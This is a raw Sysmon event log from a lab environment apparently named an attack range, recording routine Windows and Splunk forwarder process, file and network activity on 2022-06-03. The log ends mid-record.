14:17:51.625{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044203Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.625{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-180F-629A-1907-000000006002}2992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044202Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.625{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-180F-629A-1907-000000006002}2992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044201Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.626{0A5DF930-180F-629A-1907-000000006002}2992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044200Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.110{0A5DF930-180E-629A-1807-000000006002}17602648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:52.816{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB32F7544050CC00D153CA0C0B3A2DB2,SHA256=90176B9CD151C7FB0BEA210E8973D3237C66498FE34173DE3094589A6E55639E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044228Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1810-629A-1A07-000000006002}1344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044227Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044226Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044225Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044224Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044223Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044222Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044221Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044220Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044219Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044218Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E35B-6299-0500-000000006002}4121840C:\Windows\system32\csrss.exe{0A5DF930-1810-629A-1A07-000000006002}1344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044217Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.610{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1810-629A-1A07-000000006002}1344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044216Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.611{0A5DF930-1810-629A-1A07-000000006002}1344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044215Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:52.047{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42EB4567552148397303F50358D085E7,SHA256=620E41E5E15350BB944D5DCBF1D9E4218090283246DFA7FE565F2B173B0DEFF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:53.948{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=919DA6A770A92E7755401EC69ABF0240,SHA256=FC88365904C137266FF253E263FEAB8F56FFC5BCF08F8AA623C8892CF948B77F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044230Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:51.670{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52341-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044229Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:53.125{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40EDF9757DAF20032C64B58B3AFCFC80,SHA256=F08C0340752B6C60F0A66067076EF8AEE04411EF0D6B56CD778C31CA31B9A7B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:54.983{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4BFD4C15B8B00A2D5D7E01C8CE0744A,SHA256=3FB417B928A3B23B94E34E9E067338682855397093E99C22ED06B9CF66E802D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044231Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:54.219{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08689BAD89AC11C783A55AC554FDA829,SHA256=785697BCED64FDD0A5888A424787529085718256BD196DC361A3D4D6291E6AAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044232Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:55.313{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94927AC9C804CC90DDA64F8A00449F18,SHA256=3F1ACBDF3173038BBF12FA266649F99C78F0DD5EA90E411F28743B7637C35689,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:53.759{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56370-false10.0.1.12-8000- 23542300x800000000000000044233Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:56.407{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F2EC057856760CC66E61BF68E841F29,SHA256=685B4941AFEEDE5079BA4F264F7A8F12EFA7C199D9FAE1909084ABBAF2A28270,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:56.068{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B029377740BA39BD3681188BCFDC01BA,SHA256=A0A8C8F9DEDC019E4AC025A69D91F7A553D4259614C4890C8612432C1564E6CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044234Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:57.500{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE68443F0828D8E4EB5609E26F68317E,SHA256=872B2AEEF6ABA35D5471FC1B440498A10DF039D571CDDC75DEBFA58FBFCE39A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:57.197{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=042C7971A6B0BFE73E4C5F531F3681B1,SHA256=3DB1101D609F09529FC37EF845EBA200D5A0AEF09D754C0892133EA69928063E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044235Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:58.594{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=934A4621DD23A96DDCA36203E2430734,SHA256=260B707845DDB15446E7FAC6A323CAA0623438D9439302F34026156D3FBC392D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:58.284{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59BF109D46918662E0F2FE2595DEB6DB,SHA256=B56C037FFACA6DC1E2F42E225075D489C50BFDE33431FFB7646BDEF38498CE12,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044237Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:57.701{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52342-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044236Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:59.688{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88C507DD9BFCA213C07E7488C4AEAB94,SHA256=85403671980D831E204B79E9AD0077470D7BB63C9667BC0B4678D9BCBBB4CBAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:59.384{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 